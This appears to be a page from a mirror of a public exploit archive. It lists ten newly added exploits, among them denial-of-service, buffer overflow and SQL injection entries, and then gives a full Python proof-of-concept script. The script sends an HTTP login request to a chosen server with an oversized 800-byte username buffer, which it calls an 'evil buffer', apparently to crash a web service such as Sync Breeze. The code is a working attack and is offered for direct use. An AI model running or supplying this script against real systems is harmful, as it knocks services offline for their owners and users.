6ec646f7e1
10 changes to exploits/shellcodes Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC) Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC) Savant Web Server 3.1 - Denial of-Service (PoC) ALLPlayer 7.5 - Denial of-Service (PoC) 10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR) WinGate 9.4.1.5998 - Insecure Folder Permissions HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin) Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Virtual Airlines Manager 2.6.2 - 'id' SQL Injection
33 lines
No EOL
1 KiB
Python
Executable file
33 lines
No EOL
1 KiB
Python
Executable file
#!/usr/bin/python
|
|
import socket
|
|
import sys
|
|
|
|
try:
|
|
server = sys.argv[1]
|
|
port = 80
|
|
size = 800
|
|
inputBuffer = b"A" * size
|
|
content = b"username=" + inputBuffer + b"&password=A"
|
|
|
|
buffer = b"POST /login HTTP/1.1\r\n"
|
|
buffer += b"Host: " + server.encode() + b"\r\n"
|
|
buffer += b"User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
|
|
buffer += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
|
|
buffer += b"Accept-Language: en-US,en;q=0.5\r\n"
|
|
buffer += b"Referer: http://10.11.0.22/login\r\n"
|
|
buffer += b"Connection: close\r\n"
|
|
buffer += b"Content-Type: application/x-www-form-urlencoded\r\n"
|
|
buffer += b"Content-Length: "+ str(len(content)).encode() + b"\r\n"
|
|
buffer += b"\r\n"
|
|
buffer += content
|
|
|
|
print("Sending evil buffer...")
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.connect((server, port))
|
|
s.send(buffer)
|
|
s.close()
|
|
|
|
print("Done!")
|
|
|
|
except socket.error:
|
|
print("Could not connect!") |